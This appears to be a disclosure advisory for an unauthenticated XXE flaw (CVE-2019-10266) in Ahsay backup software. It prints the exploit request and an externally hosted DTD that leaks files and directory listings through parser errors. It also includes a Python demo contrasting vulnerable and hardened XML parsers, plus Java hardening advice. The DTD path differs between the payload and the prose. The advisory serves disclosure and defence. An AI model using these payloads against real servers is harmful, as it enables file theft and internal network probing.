CVE-2019-10266 - unauthenticated XML External Entity (XXE)
Upgrade to the latest version of Ahsay, currently 18.104.22.168 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp)
By sending an XXE payload in the following POST request, the server is made to raise an error that discloses the content of a file or a directory listing:
POST /obs/obm8/user/setUserProfile HTTP/1.1
Content-Type: application/octet-stream
Content-Length: 126
Host: 172.16.238.213:80

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % remote SYSTEM "https://www.wbsec.nl/ahsay/oob.dtd"> %remote;%intern; %trick;]>
As you can see, the DOCTYPE pulls in an external DTD, https://www.wbsec.nl/xxe/oob.dtd, which is hosted on my server and contains:
<!ENTITY % payl SYSTEM "file:///c:/">
<!ENTITY % intern "<!ENTITY % trick SYSTEM 'file://:%payl;/%payl;'>">
When the server processes the POST request, it fetches oob.dtd and tries to resolve the entities it declares: %payl expands to the listing of c:\, %intern declares %trick with that listing embedded in a malformed file:// URL, and resolving %trick fails. The resulting error message echoes the URL the parser could not open, and with it the content of the directory. The same chain reads arbitrary files when %payl points at a file instead of a directory, and because the entity can just as well point at an http:// URL, it can also be used to scan internal networks and send requests to internal systems. No authentication is required to exploit this.
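The error-based trick above only works because the server's XML parser fetches external entities at all. The following is an added example, not code from the advisory or from Ahsay, that shows that root cause on a parser you can run locally: Python's standard-library xml.sax with external general entities switched on expands a SYSTEM entity to the contents of a local file, the default setting expands it to nothing, and a hardened parser refuses the DOCTYPE before any entity can be declared. The secret file, its file:// URL (built with pathlib's as_uri, so it is assumed to run on a POSIX or Windows host where urllib can open local file URLs) and the payload are all constructed inside the block for the demo.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Collects character data so we can see what an entity expanded to."""

    def __init__(self):
        super().__init__()
        self.text = []

    def characters(self, content):
        self.text.append(content)


class DoctypeRejector:
    """Lexical handler that aborts parsing as soon as a DOCTYPE appears.
    Without a DOCTYPE no entity (internal or external) can be declared,
    which removes the XXE surface entirely."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE declarations are not allowed: %s" % name)

    def endDTD(self):
        pass

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass


def build_payload(file_url):
    """Constructed direct XXE payload: the entity is placed in the document
    body, so any parser that echoes or logs the document leaks the file.
    (The Ahsay case needs the error-based DTD chain because the server does
    not echo the document; the parser behaviour being abused is the same.)"""
    return ('<?xml version="1.0"?>\n'
            '<!DOCTYPE root [<!ENTITY secret SYSTEM "%s">]>\n'
            '<root>&secret;</root>' % file_url)


def _run(parser, xml_text):
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return "".join(collector.text)


def parse_vulnerable(xml_text):
    """Parser configured the way an XXE-vulnerable application has it:
    external general entities are fetched (file://, http://, ...) and expanded."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, True)  # the dangerous switch
    return _run(parser, xml_text)


def parse_default(xml_text):
    """Same parser with the library default (False since Python 3.7.1):
    the external entity is not fetched, so the reference expands to nothing."""
    parser = xml.sax.make_parser()
    return _run(parser, xml_text)


def parse_hardened(xml_text):
    """Defence in depth: keep entity fetching off and reject any DOCTYPE.
    Returns None when the input is rejected, otherwise the collected text."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, False)
    parser.setFeature(handler.feature_external_pes, False)
    parser.setProperty(handler.property_lexical_handler, DoctypeRejector())
    try:
        return _run(parser, xml_text)
    except ValueError:
        return None


def demo():
    """Writes a constructed secret file, then pushes the same payload through
    the three parser configurations and returns what each one produced."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("TOP-SECRET")
    payload = build_payload(pathlib.Path(f.name).as_uri())
    return {
        "vulnerable": parse_vulnerable(payload),
        "default": parse_default(payload),
        "hardened": parse_hardened(payload),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-10s -> %r" % (name, result))
```

In a Java/JAXP parser the equivalent hardening is `DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)`, with `external-general-entities` and `external-parameter-entities` set to false as a fallback; whichever parser is in use, the check to make is that a document carrying a DOCTYPE is rejected rather than resolved.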